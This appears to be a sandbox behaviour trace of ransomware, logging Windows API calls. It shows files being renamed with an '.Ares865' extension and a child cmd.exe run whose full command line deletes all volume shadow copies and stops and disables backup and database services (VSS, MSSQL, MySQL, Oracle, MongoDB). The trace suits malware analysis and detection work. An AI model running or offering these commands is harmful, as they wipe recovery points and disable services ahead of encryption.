hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x3d45 [0079.650] WriteFile (in: hFile=0x12c, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0x102, lpOverlapped=0x0) returned 1 [0079.650] CloseHandle (hObject=0x12c) returned 1 [0079.650] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0079.650] CloseHandle (hObject=0x0) returned 0 [0079.650] CloseHandle (hObject=0x0) returned 0 [0079.650] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0079.650] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865") returned 243 [0079.651] MoveFileExW (lpExistingFileName="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\documents and settings\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), lpNewFileName="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865" (normalized: "c:\\documents and settings\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0079.651] GetLastError () returned 0x20 [0079.651] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 265 [0079.651] lstrlenA (lpString="[ERROR] C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 265 [0079.651] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0079.651] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x3e47 [0079.651] WriteFile (in: hFile=0x12c, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0x109, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0x109, lpOverlapped=0x0) returned 1 [0079.651] CloseHandle (hObject=0x12c) returned 1 [0079.651] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0079.651] CloseHandle (hObject=0x0) returned 0 [0079.651] CloseHandle (hObject=0x0) returned 0 [0079.651] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x36e8f0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d2bec40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 0 [0079.651] FindClose (in: hFindFile=0x2ccda8 | out: hFindFile=0x2ccda8) returned 1 [0079.652] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2468 [0079.683] wsprintfA (in: param_1=0x2e2f028, param_2="[ERROR] %S FindFirstFile error %i\r\n" | out: param_1="[ERROR] C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\* FindFirstFile error 3\r\n") returned 292 [0079.683] lstrlenA (lpString="[ERROR] C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\* FindFirstFile error 3\r\n") returned 292 [0079.683] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0079.683] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x3f50 [0079.683] WriteFile (in: hFile=0xa4, lpBuffer=0x2e2f028*, nNumberOfBytesToWrite=0x124, lpNumberOfBytesWritten=0x2e2e514, lpOverlapped=0x0 | out: lpBuffer=0x2e2f028*, lpNumberOfBytesWritten=0x2e2e514*=0x124, lpOverlapped=0x0) returned 1 [0079.684] CloseHandle (hObject=0xa4) returned 1 [0079.684] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d24c8 [0079.686] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865") returned 253 [0079.686] MoveFileExW (lpExistingFileName="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\documents and settings\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf"), lpNewFileName="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865" (normalized: "c:\\documents and settings\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0079.686] GetLastError () returned 0x20 [0079.686] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 275 [0079.686] lstrlenA (lpString="[ERROR] C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 275 [0079.686] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0079.687] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4074 [0079.687] WriteFile (in: hFile=0x12c, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0x113, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0x113, lpOverlapped=0x0) returned 1 [0079.687] CloseHandle (hObject=0x12c) returned 1 [0079.687] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0079.687] CloseHandle (hObject=0x0) returned 0 [0079.687] CloseHandle (hObject=0x0) returned 0 [0079.687] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0079.688] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865") returned 260 [0079.688] MoveFileExW (lpExistingFileName="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\documents and settings\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), lpNewFileName="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865" (normalized: "c:\\documents and settings\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0079.688] GetLastError () returned 0x20 [0079.688] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 282 [0079.688] lstrlenA (lpString="[ERROR] C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 282 [0079.688] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0079.688] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4187 [0079.688] WriteFile (in: hFile=0x12c, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0x11a, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0x11a, lpOverlapped=0x0) returned 1 [0079.688] CloseHandle (hObject=0x12c) returned 1 [0079.688] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0079.688] CloseHandle (hObject=0x0) returned 0 [0079.689] CloseHandle (hObject=0x0) returned 0 [0079.689] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x36e8f0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d2bec40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 0 [0079.689] FindClose (in: hFindFile=0x2ccda8 | out: hFindFile=0x2ccda8) returned 1 [0079.689] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2488 [0079.708] wsprintfA (in: param_1=0x2e2f028, param_2="[ERROR] %S FindFirstFile error %i\r\n" | out: param_1="[ERROR] C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\* FindFirstFile error 3\r\n") returned 292 [0079.708] lstrlenA (lpString="[ERROR] C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\* FindFirstFile error 3\r\n") returned 292 [0079.708] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0079.708] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x42a1 [0079.708] WriteFile (in: hFile=0xa4, lpBuffer=0x2e2f028*, nNumberOfBytesToWrite=0x124, lpNumberOfBytesWritten=0x2e2e514, lpOverlapped=0x0 | out: lpBuffer=0x2e2f028*, lpNumberOfBytesWritten=0x2e2e514*=0x124, lpOverlapped=0x0) returned 1 [0079.709] CloseHandle (hObject=0xa4) returned 1 [0079.709] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2248 [0080.969] wsprintfA (in: param_1=0x2e2f028, param_2="[ERROR] %S FindFirstFile error %i\r\n" | out: param_1="[ERROR] C:\\Documents and Settings\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\* FindFirstFile error 3\r\n") returned 292 [0080.969] lstrlenA (lpString="[ERROR] C:\\Documents and Settings\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\* FindFirstFile error 3\r\n") returned 292 [0080.969] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0080.970] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x43c5 [0080.970] WriteFile (in: hFile=0xa4, lpBuffer=0x2e2f028*, nNumberOfBytesToWrite=0x124, lpNumberOfBytesWritten=0x2e2e514, lpOverlapped=0x0 | out: lpBuffer=0x2e2f028*, lpNumberOfBytesWritten=0x2e2e514*=0x124, lpOverlapped=0x0) returned 1 [0080.970] CloseHandle (hObject=0xa4) returned 1 [0080.970] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2368 [0080.971] wsprintfA (in: param_1=0x2e2f028, param_2="[ERROR] %S FindFirstFile error %i\r\n" | out: param_1="[ERROR] C:\\Documents and Settings\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\* FindFirstFile error 3\r\n") returned 292 [0080.971] lstrlenA (lpString="[ERROR] C:\\Documents and Settings\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\* FindFirstFile error 3\r\n") returned 292 [0080.972] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0080.972] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x44e9 [0080.972] WriteFile (in: hFile=0xa4, lpBuffer=0x2e2f028*, nNumberOfBytesToWrite=0x124, lpNumberOfBytesWritten=0x2e2e514, lpOverlapped=0x0 | out: lpBuffer=0x2e2f028*, lpNumberOfBytesWritten=0x2e2e514*=0x124, lpOverlapped=0x0) returned 1 [0080.972] CloseHandle (hObject=0xa4) returned 1 [0080.972] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2608 [0081.065] wsprintfA (in: param_1=0x2e2f028, param_2="[ERROR] %S FindFirstFile error %i\r\n" | out: param_1="[ERROR] C:\\Documents and Settings\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\* FindFirstFile error 3\r\n") returned 292 [0081.065] lstrlenA (lpString="[ERROR] C:\\Documents and Settings\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\* FindFirstFile error 3\r\n") returned 292 [0081.065] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0081.066] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x460d [0081.066] WriteFile (in: hFile=0xa4, lpBuffer=0x2e2f028*, nNumberOfBytesToWrite=0x124, lpNumberOfBytesWritten=0x2e2e514, lpOverlapped=0x0 | out: lpBuffer=0x2e2f028*, lpNumberOfBytesWritten=0x2e2e514*=0x124, lpOverlapped=0x0) returned 1 [0081.066] CloseHandle (hObject=0xa4) returned 1 [0081.066] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d25a8 Thread: id = 8 os_tid = 0x9f4 Thread: id = 9 os_tid = 0xa78 Process: id = "2" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x4db8d000" os_pid = "0x9d0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x930" cmd_line = "C:\\Windows\\system32\\cmd.exe /c @echo off\r\nvssadmin delete shadows /all /quiet\r\nsc config browser\r\nsc config browser start=enabled\r\nsc stop vss\r\nsc config vss start=disabled\r\nsc stop MongoDB\r\nsc config MongoDB start=disabled\r\nsc stop SQLWriter\r\nsc config SQLWriter start=disabled\r\nsc stop MSSQLServerOLAPService\r\nsc config MSSQLServerOLAPService start=disabled\r\nsc stop MSSQLSERVER\r\nsc config MSSQLSERVER start=disabled\r\nsc stop MSSQL$SQLEXPRESS\r\nsc config MSSQL$SQLEXPRESS start=disabled\r\nsc stop ReportServer\r\nsc config ReportServer start=disabled\r\nsc stop OracleServiceORCL\r\nsc config OracleServiceORCL start=disabled\r\nsc stop OracleDBConsoleorcl\r\nsc config OracleDBConsoleorcl start=disabled\r\nsc stop OracleMTSRecoveryService\r\nsc config OracleMTSRecoveryService start=disabled\r\nsc stop OracleVssWriterORCL\r\nsc config OracleVssWriterORCL start=disabled\r\nsc stop MySQL\r\nsc config MySQL start=disabled\r\n" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 4 os_tid = 0x9d4 [0038.984] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x3ef7ac | out: lpSystemTimeAsFileTime=0x3ef7ac*(dwLowDateTime=0x4913f0e0, dwHighDateTime=0x1d56a3b)) [0038.984] GetCurrentProcessId () returned 0x9d0 [0038.984] GetCurrentThreadId () returned 0x9d4 [0038.984] GetTickCount () returned 0x114517b [0038.984] QueryPerformanceCounter (in: lpPerformanceCount=0x3ef7a4 | out: lpPerformanceCount=0x3ef7a4*=15897509008) returned 1 [0038.985] GetModuleHandleA (lpModuleName=0x0) returned 0x4a300000 [0038.985] __set_app_type (_Type=0x1) [0038.985] __p__fmode () returned 0x74eb31f4 [0038.985] __p__commode () returned 0x74eb31fc [0038.986] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a3221a6) returned 0x0 [0038.986] __getmainargs (in: _Argc=0x4a324238, _Argv=0x4a324240, _Env=0x4a32423c, _DoWildCard=0, _StartInfo=0x4a324140 | out: _Argc=0x4a324238, _Argv=0x4a324240, _Env=0x4a32423c) returned 0 [0038.986] GetCurrentThreadId () returned 0x9d4 [0038.986] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9d4) returned 0x60 [0038.986] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0038.986] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadUILanguage") returned 0x76c4a84f [0038.986] SetThreadUILanguage (LangId=0x0) returned 0x409 [0038.987] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0038.987] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x3ef73c | out: phkResult=0x3ef73c*=0x0) returned 0x2 [0038.987] VirtualQuery (in: lpAddress=0x3ef773, lpBuffer=0x3ef70c, dwLength=0x1c | out: lpBuffer=0x3ef70c*(BaseAddress=0x3ef000, AllocationBase=0x2f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0038.987] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x3ef70c, dwLength=0x1c | out: lpBuffer=0x3ef70c*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0038.987] VirtualQuery (in: lpAddress=0x2f1000, lpBuffer=0x3ef70c, dwLength=0x1c | out: lpBuffer=0x3ef70c*(BaseAddress=0x2f1000, AllocationBase=0x2f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0038.987] VirtualQuery (in: lpAddress=0x2f3000, lpBuffer=0x3ef70c, dwLength=0x1c | out: lpBuffer=0x3ef70c*(BaseAddress=0x2f3000, AllocationBase=0x2f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0038.987] VirtualQuery (in: lpAddress=0x3f0000, lpBuffer=0x3ef70c, dwLength=0x1c | out: lpBuffer=0x3ef70c*(BaseAddress=0x3f0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x50000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0038.987] GetConsoleOutputCP () returned 0x1b5 [0038.987] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a324260 | out: lpCPInfo=0x4a324260) returned 1 [0038.987] SetConsoleCtrlHandler (HandlerRoutine=0x4a31e72a, Add=1) returned 1 [0038.987] _get_osfhandle (_FileHandle=1) returned 0x7 [0038.987] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0038.988] _get_osfhandle (_FileHandle=1) returned 0x7 [0038.988] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a3241ac | out: lpMode=0x4a3241ac) returned 1 [0038.988] _get_osfhandle (_FileHandle=1) returned 0x7 [0038.988] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0038.988] _get_osfhandle (_FileHandle=0) returned 0x3 [0038.988] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a3241b0 | out: lpMode=0x4a3241b0) returned 1 [0038.989] _get_osfhandle (_FileHandle=0) returned 0x3 [0038.989] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0038.989] GetEnvironmentStringsW () returned 0x452c60* [0038.989] GetProcessHeap () returned 0x440000 [0038.989] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xaca) returned 0x453738 [0038.989] FreeEnvironmentStringsW (penv=0x452c60) returned 1 [0038.989] GetProcessHeap () returned 0x440000 [0038.989] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x4) returned 0x451898 [0038.989] GetEnvironmentStringsW () returned 0x452c60* [0038.989] GetProcessHeap () returned 0x440000 [0038.990] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xaca) returned 0x454210 [0038.990] FreeEnvironmentStringsW (penv=0x452c60) returned 1 [0038.990] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3ee6ac | out: phkResult=0x3ee6ac*=0x68) returned 0x0 [0038.990] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3ee6b4, 